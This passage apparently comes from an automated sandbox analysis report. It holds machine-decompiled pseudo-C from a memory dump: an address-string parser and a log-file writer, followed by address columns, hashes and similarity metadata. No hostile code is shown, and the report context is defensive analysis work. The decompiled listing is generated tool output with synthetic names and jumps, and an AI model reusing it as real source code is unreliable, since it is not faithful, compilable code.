				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E0094EE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E0094EE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E0094685D(_t167, 4) == 0) {
								if(E0094685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E0094685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E0094685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E00928980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E0091DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E0094EE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E0094EE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

























                                                                                                                                                      0x0094fcd1
                                                                                                                                                      0x0094fcd6
                                                                                                                                                      0x0094fcd9
                                                                                                                                                      0x0094fcdc
                                                                                                                                                      0x0094fcdf
                                                                                                                                                      0x0094fce2
                                                                                                                                                      0x0094fce5
                                                                                                                                                      0x0094fce8
                                                                                                                                                      0x0094fceb
                                                                                                                                                      0x0094fced
                                                                                                                                                      0x0094fced
                                                                                                                                                      0x0094fcf3
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0094fcfc
                                                                                                                                                      0x0094fcfe
                                                                                                                                                      0x0094fdc1
                                                                                                                                                      0x0097ecbd
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0097eccc
                                                                                                                                                      0x0097eccc
                                                                                                                                                      0x0097ecd2
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0097ecdf
                                                                                                                                                      0x0097ece0
                                                                                                                                                      0x0097ece4
                                                                                                                                                      0x0097eceb
                                                                                                                                                      0x0097ecee
                                                                                                                                                      0x0097eca8
                                                                                                                                                      0x0097eca8
                                                                                                                                                      0x0097ecaa
                                                                                                                                                      0x0094fd76
                                                                                                                                                      0x0094fd79
                                                                                                                                                      0x0094fdb4
                                                                                                                                                      0x0094fdb5
                                                                                                                                                      0x0094fdb6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0094fdb6
                                                                                                                                                      0x0094fd7e
                                                                                                                                                      0x0097ecfc
                                                                                                                                                      0x0094fe2f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0094fe2f
                                                                                                                                                      0x0097ed08
                                                                                                                                                      0x0097ed0f
                                                                                                                                                      0x0097ed17
                                                                                                                                                      0x0097ed1b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0097ed1b
                                                                                                                                                      0x0094fd88
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0094fd94
                                                                                                                                                      0x0094fd99
                                                                                                                                                      0x0094fda1
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0094fdb0
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0094fdb0
                                                                                                                                                      0x0097ecbd
                                                                                                                                                      0x0094fdc7
                                                                                                                                                      0x0094fdcb
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0094fdd7
                                                                                                                                                      0x0094fde3
                                                                                                                                                      0x0094fe06
                                                                                                                                                      0x00961fe7
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00961fef
                                                                                                                                                      0x00961ff0
                                                                                                                                                      0x00961ff4
                                                                                                                                                      0x00961ff7
                                                                                                                                                      0x00961ffa
                                                                                                                                                      0x00961ffd
                                                                                                                                                      0x00962000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0097ecf1
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0097ecf1
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0094fe06
                                                                                                                                                      0x0094fde8
                                                                                                                                                      0x0094fdec
                                                                                                                                                      0x0094fdef
                                                                                                                                                      0x0094fdf2
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0094fdf2
                                                                                                                                                      0x0094fdcb
                                                                                                                                                      0x0094fd04
                                                                                                                                                      0x0094fd05
                                                                                                                                                      0x0097ec67
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0097ec6f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0097ec6f
                                                                                                                                                      0x0094fd13
                                                                                                                                                      0x0094fd3c
                                                                                                                                                      0x0094fd40
                                                                                                                                                      0x0097ec75
                                                                                                                                                      0x0097ec7a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0097ec8a
                                                                                                                                                      0x0097ec8a
                                                                                                                                                      0x0097ec90
                                                                                                                                                      0x0097ecb2
                                                                                                                                                      0x0094fd73
                                                                                                                                                      0x0094fd73
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0094fd73
                                                                                                                                                      0x0097ec95
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0097eca1
                                                                                                                                                      0x0097eca4
                                                                                                                                                      0x0097eca5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0097eca5
                                                                                                                                                      0x0097ec7a
                                                                                                                                                      0x0094fd4a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0094fd6e
                                                                                                                                                      0x0094fd6e
                                                                                                                                                      0x0094fd71
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0094fd71
                                                                                                                                                      0x0094fd4a
                                                                                                                                                      0x0094fd21
                                                                                                                                                      0x0095a3a1
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0095a3a1
                                                                                                                                                      0x0094fd36
                                                                                                                                                      0x0096200b
                                                                                                                                                      0x00962012
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00962018
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00962018
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0094fd36
                                                                                                                                                      0x0094fe0f
                                                                                                                                                      0x0094fe16
                                                                                                                                                      0x0095a3ad
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0095a3b3
                                                                                                                                                      0x0095a3b3
                                                                                                                                                      0x0094fe1f
                                                                                                                                                      0x0097ed25
                                                                                                                                                      0x0097ed86
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0097ed91
                                                                                                                                                      0x0097ed95
                                                                                                                                                      0x0097ed95
                                                                                                                                                      0x0097ed9a
                                                                                                                                                      0x0097edad
                                                                                                                                                      0x0097edb3
                                                                                                                                                      0x0097edba
                                                                                                                                                      0x0097edc4
                                                                                                                                                      0x0097edc9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0097edcc
                                                                                                                                                      0x0097ed2a
                                                                                                                                                      0x0097ed55
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0097ed61
                                                                                                                                                      0x0097ed66
                                                                                                                                                      0x0097ed6e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0097ed7d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0097ed7d
                                                                                                                                                      0x0097ed30
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0097ed3c
                                                                                                                                                      0x0097ed43
                                                                                                                                                      0x0097ed4b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218172040.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                                                                                                                      • Associated: 00000005.00000002.2218167906.00000000008F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218237266.00000000009E0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218241028.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218246476.00000000009F4000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218251764.00000000009F7000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218255269.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218289035.0000000000A60000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __fassign
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3965848254-0
                                                                                                                                                      • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                      • Instruction ID: c5c6ff21687514e1d96d00d2caf9acf8297ec8c698c99a0c8ac3dff7d0cc2a40
                                                                                                                                                      • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                      • Instruction Fuzzy Hash: A2919172D0021AEFDF24CF59C855AAFB7B8FF55309F24847AD445A72A2E7304A41CB91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 009CE9FF, Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 435COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 80%
                                                                                                                                                      			E009CE9FF(void* __edx, signed int _a4, intOrPtr _a8, char _a12) {
				signed int _v5;
				int _v12;
				signed int _v16;
				char _v20;
				int _v24;
				signed int _v28;
				int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				intOrPtr _v52;
				char _v60;
				signed int _v64;
				char _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void _v96;
				char _v100;
				void _v140;
				char _v144;
				intOrPtr _v160;
				intOrPtr _v164;
				char _v172;
				char _v216;
				char _v220;
				void* __edi;
				void* __esi;
				void* _t231;
				signed char _t233;
				signed int _t237;
				signed int _t238;
				signed int _t244;
				short _t251;
				signed int _t253;
				signed int* _t254;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t260;
				signed int _t267;
				signed int _t271;
				intOrPtr _t281;
				signed int _t314;
				signed char _t316;
				signed int _t319;
				signed int _t322;
				signed int _t323;
				signed int _t326;
				signed int _t328;
				signed int _t330;
				signed int _t332;
				signed int _t334;
				int _t340;
				intOrPtr* _t341;
				signed int _t342;
				signed int _t343;
				signed int _t345;
				signed int _t347;
				signed int _t352;
				void* _t360;
				intOrPtr* _t370;
				intOrPtr _t371;
				intOrPtr* _t372;

				_t360 = __edx;
				_t340 = 0;
				_t345 = 0xa;
				_v144 = 0;
				memset( &_v140, 0, _t345 << 2);
				_v20 = 0;
				_v220 = 0;
				E0091DFC0( &_v216, 0, 0x2c);
				_t371 = _a8;
				_t347 = 7;
				_v100 = 0;
				_t231 = memset( &_v96, 0, _t347 << 2);
				_t348 = 0;
				_v12 = 0;
				_v32 = 0;
				_v24 = 0;
				_v5 = _t231;
				if(_t371 != 0) {
					_v5 = 1;
				}
				_t370 = _a4;
				_t233 =  *(_t370 + 0xcc) >> 3;
				_t380 = _t233 & 0x00000001;
				if((_t233 & 0x00000001) != 0) {
					E009CE919(_t360, _t380, _t370 + 0x70, _t370 + 0x78, _t370 + 0x68);
				}
				_v52 =  *((intOrPtr*)(_t370 + 0x6c));
				_v16 =  *(_t370 + 0x80);
				if(_v5 != _t340) {
					_t42 = _t371 + 0x20; // 0x9cc2d6
					_v32 = _t42;
					_t44 = _t371 + 4; // 0x5bcd335e
					_t237 =  *_t44 & 0x0000ffff;
					_v24 = _t237;
					_t238 = _t237 + 0x48;
					__eflags = _t238;
					L12:
					_v28 = _t238;
					_t372 = E0091E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _v16);
					if(_t372 != _t340) {
						_t54 = _t372 + 0x48; // 0x48
						_t341 = _t54;
						_t244 = E009CE519(_t360, _v52, 0xc0000000, 1,  &_a12, 0x20000080,  &_v12);
						__eflags = _t244;
						_a4 = _t244;
						if(_t244 < 0) {
							L49:
							__eflags = _v12;
							if(_v12 != 0) {
								E0090F9F0(_v12);
							}
							L51:
							_t340 = 0;
							__eflags = 0;
							L52:
							if(_t372 != _t340) {
								E0091E025(_t348,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t340, _t372);
							}
							L54:
							return _a4;
						}
						__eflags = _a12 - 1;
						if(_a12 != 1) {
							 *_t372 = _v16;
							_t251 = 4;
							 *((short*)(_t372 + 0x36)) = _t251;
							 *((short*)(_t372 + 0x34)) = 1;
							_t253 = _v28;
							 *((char*)(_t372 + 0x29)) = 8;
							 *(_t372 + 0x30) = _t253;
							__eflags = _v5;
							if(_v5 != 0) {
								_t254 = _v32;
								_t254[8] =  *(_t370 + 0xcc) & 0x00101000 | 0x00010001;
								_t254[9] = 1;
								 *_t254 =  *(_t370 + 0x80);
								 *((char*)(_t372 + 0x6e)) = 1;
								 *((char*)(_t372 + 0x6f)) = 5;
								__eflags = _t254[0xb] - 8;
								if(_t254[0xb] != 8) {
									_t187 =  &(_t254[0x42]); // 0xf938e834
									_t255 =  *_t187;
								} else {
									_t186 =  &(_t254[0x44]); // 0x14538910
									_t255 =  *_t186;
								}
								 *(_t370 + 0x10) = _t255;
								E00912340(_t341, _a8, _v24);
								L39:
								_t257 =  *(_t372 + 0x30);
								_t342 = _v16;
								__eflags = _t257 - _t342;
								if(_t257 < _t342) {
									__eflags = _t257 - 0x48;
									if(_t257 > 0x48) {
										__eflags = _t257 + _t372;
										E0091DFC0(_t257 + _t372, 0xff, _t342 - _t257);
									}
								}
								_push(0);
								_push(0);
								_push(_t342);
								_push(_t372);
								_t348 =  &_v60;
								_push( &_v60);
								_push(0);
								_push(0);
								_push(0);
								_t259 = E0090F938(_v12);
								_a4 = _t259;
								__eflags = _t259;
								if(_t259 < 0) {
									goto L49;
								} else {
									_t260 =  *(_t370 + 0xc8);
									__eflags = _t260;
									if(_t260 == 0) {
										L48:
										_t348 = _v12;
										 *(_t370 + 0x100) = 1;
										 *(_t370 + 0xd8) = 1;
										__eflags = 0;
										 *(_t370 + 0xf0) = _t342;
										 *(_t370 + 0xf4) = 0;
										 *(_t370 + 0xe8) = _t342;
										 *(_t370 + 0xec) = 0;
										 *(_t370 + 0x5c) = _v12;
										_v12 = 0;
										goto L49;
									}
									_t352 =  *(_t370 + 0xcc);
									__eflags = _t352 & 0x00000020;
									if((_t352 & 0x00000020) == 0) {
										goto L48;
									}
									__eflags = _t352 & 0x00002000;
									_t348 = 0x400;
									if((_t352 & 0x00002000) == 0) {
										_t348 = 0x100000;
									}
									_push(0x14);
									_v40 = _t260 * _t348;
									_push(8);
									_push( &_v40);
									_push( &_v60);
									_v36 = _t260 * _t348 >> 0x20;
									_t267 = E0090FC48(_v12);
									_a4 = _t267;
									__eflags = _t267;
									if(_t267 < 0) {
										goto L49;
									} else {
										goto L48;
									}
								}
							}
							 *((intOrPtr*)(_t341 + 4)) = _t253 + 0xffffffb8;
							 *_t341 = 0xc0010000;
							_t271 =  *(_t370 + 0x10);
							__eflags = _t271 - 2;
							if(_t271 != 2) {
								__eflags = _t271 - 3;
								if(_t271 != 3) {
									_v48 = 0;
									_v44 = 0;
									E00922954(1, _t372,  &_v48);
									 *(_t341 + 0x10) = _v48;
									 *((intOrPtr*)(_t341 + 0x14)) = _v44;
									L34:
									 *((intOrPtr*)(_t341 + 0xc)) = _v164;
									 *((intOrPtr*)(_t341 + 8)) = _v160;
									 *((intOrPtr*)(_t341 + 0x18)) = E00954FC0(_v84, _v80, _v140, 0);
									 *((intOrPtr*)(_t341 + 0x1c)) = E00954FC0(_v76, _v72, _v140, 0);
									_t281 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
									 *((char*)(_t372 + 0x6c)) =  *((intOrPtr*)(_t281 + 0xa4));
									 *((char*)(_t372 + 0x6d)) =  *((intOrPtr*)(_t281 + 0xa8));
									 *((char*)(_t372 + 0x6e)) = 1;
									 *((char*)(_t372 + 0x6f)) = 5;
									 *(_t372 + 0x70) =  *(_t281 + 0xac) & 0x0000ffff;
									 *(_t372 + 0x170) =  *(_t370 + 0x10);
									 *(_t372 + 0x74) =  *(_t370 + 0x7c);
									 *((intOrPtr*)(_t372 + 0x90)) = 1;
									 *(_t372 + 0x8c) = 1;
									 *((intOrPtr*)(_t372 + 0x94)) = 4;
									 *((intOrPtr*)(_t372 + 0x68)) = _v16;
									 *(_t372 + 0x84) =  *(_t370 + 0xc8);
									 *(_t372 + 0x88) =  *(_t370 + 0xcc);
									 *((intOrPtr*)(_t372 + 0x80)) = _v140;
									 *((intOrPtr*)(_t372 + 0x158)) = _v220;
									 *(_t372 + 0xa0) =  *(_t372 + 0xa0) & 0x00000000;
									 *(_t372 + 0xa4) =  *(_t372 + 0xa4) & 0x00000000;
									 *((intOrPtr*)(_t372 + 0x15c)) = _v216;
									 *((intOrPtr*)(_t372 + 0x9c)) = _v20;
									_t163 = _t372 + 0x178; // 0x178
									E00912340(_t163,  *((intOrPtr*)(_t370 + 0x64)), ( *(_t370 + 0x60) & 0x0000ffff) + 2);
									E00912340(( *(_t370 + 0x60) & 0x0000ffff) + _t372 + 0x17a,  *((intOrPtr*)(_t370 + 0x6c)), ( *(_t370 + 0x68) & 0x0000ffff) + 2);
									_t169 = _t372 + 0xa8; // 0xa8
									E009CE649(0, _t370, _t372, _t169);
									_t170 = _t372 + 0x160; // 0x160
									E0092B2FA(_v16, 0, _t170);
									 *((intOrPtr*)(_t372 + 0x168)) =  *_t370;
									 *((intOrPtr*)(_t372 + 0x16c)) =  *((intOrPtr*)(_t370 + 4));
									 *(_t341 + 0x10) =  *(_t370 + 8);
									 *((intOrPtr*)(_t341 + 0x14)) =  *((intOrPtr*)(_t370 + 0xc));
									goto L39;
								}
								asm("rdtsc");
								L32:
								 *(_t341 + 0x10) = _t271;
								 *((intOrPtr*)(_t341 + 0x14)) = 0;
								goto L34;
							}
							_t271 = E009CBCFC();
							goto L32;
						}
						_push(0);
						_push( &_v68);
						_push(_v16);
						_push(_t372);
						_push( &_v60);
						_push(0);
						_push(0);
						_push(0);
						_v68 = 0;
						_v64 = 0;
						_t314 = E0090F900(_v12);
						_a4 = _t314;
						__eflags = _t314;
						if(_t314 < 0) {
							goto L49;
						}
						_t316 =  *(_t372 + 0x88) >> 1;
						__eflags = _t316 & 0x00000001;
						if((_t316 & 0x00000001) == 0) {
							__eflags =  *((intOrPtr*)(_t372 + 0x6c)) -  *0x7ffe026c;
							if( *((intOrPtr*)(_t372 + 0x6c)) !=  *0x7ffe026c) {
								goto L18;
							}
							__eflags =  *((intOrPtr*)(_t372 + 0x6d)) -  *0x7ffe0270;
							if( *((intOrPtr*)(_t372 + 0x6d)) !=  *0x7ffe0270) {
								goto L18;
							}
							__eflags =  *((intOrPtr*)(_t372 + 0x94)) - 4;
							if( *((intOrPtr*)(_t372 + 0x94)) != 4) {
								goto L18;
							}
							_t319 =  *((intOrPtr*)(_t372 + 0x68));
							_t343 =  *(_t372 + 0x8c);
							_v16 = _t319;
							__eflags = _t319 + 0xfffffc00 - 0xffc00;
							if(_t319 + 0xfffffc00 > 0xffc00) {
								goto L18;
							}
							__eflags = _t343;
							if(_t343 == 0) {
								goto L18;
							}
							_t348 =  *(_t372 + 0x78) |  *(_t372 + 0x7c);
							__eflags =  *(_t372 + 0x78) |  *(_t372 + 0x7c);
							if(( *(_t372 + 0x78) |  *(_t372 + 0x7c)) == 0) {
								goto L18;
							}
							_t348 =  *(_t372 + 0x74);
							__eflags =  *(_t372 + 0x74) -  *(_t370 + 0x7c);
							if( *(_t372 + 0x74) !=  *(_t370 + 0x7c)) {
								goto L18;
							}
							_push(0);
							_push( &_v68);
							 *(_t372 + 0x78) = 0;
							 *(_t372 + 0x7c) = 0;
							_push( *(_t370 + 0x80));
							_t348 =  &_v60;
							_push(_t372);
							_push( &_v60);
							_push(0);
							_push(0);
							_push(0);
							_t322 = E0090F938(_v12);
							 *(_t370 + 0xec) =  *(_t370 + 0xec) & 0x00000000;
							_a4 = _t322;
							_t323 = _v16;
							 *(_t370 + 0x100) = _t343;
							 *(_t370 + 0xd8) = _t343;
							 *(_t370 + 0xf4) =  *(_t370 + 0xf4) & 0x00000000;
							 *(_t370 + 0x80) = _t323;
							 *(_t370 + 0xe8) = _t323;
							 *(_t370 + 0xf0) = _t343 * _t323;
							 *(_t370 + 0x5c) = _v12;
							goto L51;
						}
						L18:
						_a4 = 0xc000000d;
						goto L49;
					}
					_a4 = 0xc0000017;
					goto L52;
				}
				_push(_t340);
				_push(0x2c);
				_push( &_v144);
				_t326 = E0090FDC0(_t340);
				_a4 = _t326;
				if(_t326 < _t340) {
					goto L54;
				}
				_push(_t340);
				_push(0x1c);
				_push( &_v172);
				_push(_t340);
				_t328 = E0090FC18(0xfffffffe);
				_a4 = _t328;
				if(_t328 < _t340) {
					goto L54;
				}
				_push(_t340);
				_push(0x20);
				_push( &_v100);
				_push(1);
				_t330 = E0090FC18(0xfffffffe);
				_a4 = _t330;
				if(_t330 < _t340) {
					goto L54;
				}
				_push(_t340);
				_push(0x30);
				_push( &_v220);
				_t332 = E0090FDC0(3);
				_a4 = _t332;
				if(_t332 < _t340) {
					goto L54;
				}
				_t334 = E00968001(_t348, _t360, _t370, _t340,  &_v20);
				_a4 = _t334;
				if(_t334 < _t340) {
					goto L54;
				}
				_t348 =  *(_t370 + 0x60) & 0x0000ffff;
				_t238 = ( *(_t370 + 0x68) & 0x0000ffff) + ( *(_t370 + 0x60) & 0x0000ffff) + 0x17c;
				goto L12;
			}





































































                                                                                                                                                      0x009ce9ff
                                                                                                                                                      0x009cea0f
                                                                                                                                                      0x009cea11
                                                                                                                                                      0x009cea1c
                                                                                                                                                      0x009cea22
                                                                                                                                                      0x009cea2c
                                                                                                                                                      0x009cea2f
                                                                                                                                                      0x009cea35
                                                                                                                                                      0x009cea3a
                                                                                                                                                      0x009cea44
                                                                                                                                                      0x009cea48
                                                                                                                                                      0x009cea4b
                                                                                                                                                      0x009cea4b
                                                                                                                                                      0x009cea4d
                                                                                                                                                      0x009cea50
                                                                                                                                                      0x009cea53
                                                                                                                                                      0x009cea56
                                                                                                                                                      0x009cea5b
                                                                                                                                                      0x009cea5d
                                                                                                                                                      0x009cea5d
                                                                                                                                                      0x009cea61
                                                                                                                                                      0x009cea6a
                                                                                                                                                      0x009cea6d
                                                                                                                                                      0x009cea6f
                                                                                                                                                      0x009cea7d
                                                                                                                                                      0x009cea7d
                                                                                                                                                      0x009cea85
                                                                                                                                                      0x009cea8e
                                                                                                                                                      0x009cea94
                                                                                                                                                      0x009ceb2f
                                                                                                                                                      0x009ceb32
                                                                                                                                                      0x009ceb35
                                                                                                                                                      0x009ceb35
                                                                                                                                                      0x009ceb39
                                                                                                                                                      0x009ceb3c
                                                                                                                                                      0x009ceb3c
                                                                                                                                                      0x009ceb3f
                                                                                                                                                      0x009ceb42
                                                                                                                                                      0x009ceb58
                                                                                                                                                      0x009ceb5c
                                                                                                                                                      0x009ceb81
                                                                                                                                                      0x009ceb81
                                                                                                                                                      0x009ceb84
                                                                                                                                                      0x009ceb8b
                                                                                                                                                      0x009ceb8d
                                                                                                                                                      0x009ceb90
                                                                                                                                                      0x009cef60
                                                                                                                                                      0x009cef60
                                                                                                                                                      0x009cef64
                                                                                                                                                      0x009cef69
                                                                                                                                                      0x009cef69
                                                                                                                                                      0x009cef6e
                                                                                                                                                      0x009cef6e
                                                                                                                                                      0x009cef6e
                                                                                                                                                      0x009cef70
                                                                                                                                                      0x009cef72
                                                                                                                                                      0x009cef82
                                                                                                                                                      0x009cef82
                                                                                                                                                      0x009cef87
                                                                                                                                                      0x009cef8e
                                                                                                                                                      0x009cef8e
                                                                                                                                                      0x009ceb96
                                                                                                                                                      0x009ceb9a
                                                                                                                                                      0x009cec92
                                                                                                                                                      0x009cec98
                                                                                                                                                      0x009cec9a
                                                                                                                                                      0x009ceca0
                                                                                                                                                      0x009ceca4
                                                                                                                                                      0x009ceca7
                                                                                                                                                      0x009cecab
                                                                                                                                                      0x009cecae
                                                                                                                                                      0x009cecb1
                                                                                                                                                      0x009cee59
                                                                                                                                                      0x009cee68
                                                                                                                                                      0x009cee6b
                                                                                                                                                      0x009cee74
                                                                                                                                                      0x009cee76
                                                                                                                                                      0x009cee7a
                                                                                                                                                      0x009cee7e
                                                                                                                                                      0x009cee82
                                                                                                                                                      0x009cee8c
                                                                                                                                                      0x009cee8c
                                                                                                                                                      0x009cee84
                                                                                                                                                      0x009cee84
                                                                                                                                                      0x009cee84
                                                                                                                                                      0x009cee84
                                                                                                                                                      0x009cee95
                                                                                                                                                      0x009cee9c
                                                                                                                                                      0x009ceea4
                                                                                                                                                      0x009ceea4
                                                                                                                                                      0x009ceea7
                                                                                                                                                      0x009ceeaa
                                                                                                                                                      0x009ceeac
                                                                                                                                                      0x009ceeae
                                                                                                                                                      0x009ceeb1
                                                                                                                                                      0x009ceeb8
                                                                                                                                                      0x009ceec0
                                                                                                                                                      0x009ceec5
                                                                                                                                                      0x009ceeb1
                                                                                                                                                      0x009ceeca
                                                                                                                                                      0x009ceecb
                                                                                                                                                      0x009ceecc
                                                                                                                                                      0x009ceecd
                                                                                                                                                      0x009ceece
                                                                                                                                                      0x009ceed1
                                                                                                                                                      0x009ceed2
                                                                                                                                                      0x009ceed3
                                                                                                                                                      0x009ceed4
                                                                                                                                                      0x009ceed8
                                                                                                                                                      0x009ceedd
                                                                                                                                                      0x009ceee0
                                                                                                                                                      0x009ceee2
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009ceee4
                                                                                                                                                      0x009ceee4
                                                                                                                                                      0x009ceeea
                                                                                                                                                      0x009ceeec
                                                                                                                                                      0x009cef2e
                                                                                                                                                      0x009cef2e
                                                                                                                                                      0x009cef34
                                                                                                                                                      0x009cef3a
                                                                                                                                                      0x009cef40
                                                                                                                                                      0x009cef42
                                                                                                                                                      0x009cef48
                                                                                                                                                      0x009cef4e
                                                                                                                                                      0x009cef54
                                                                                                                                                      0x009cef5a
                                                                                                                                                      0x009cef5d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009cef5d
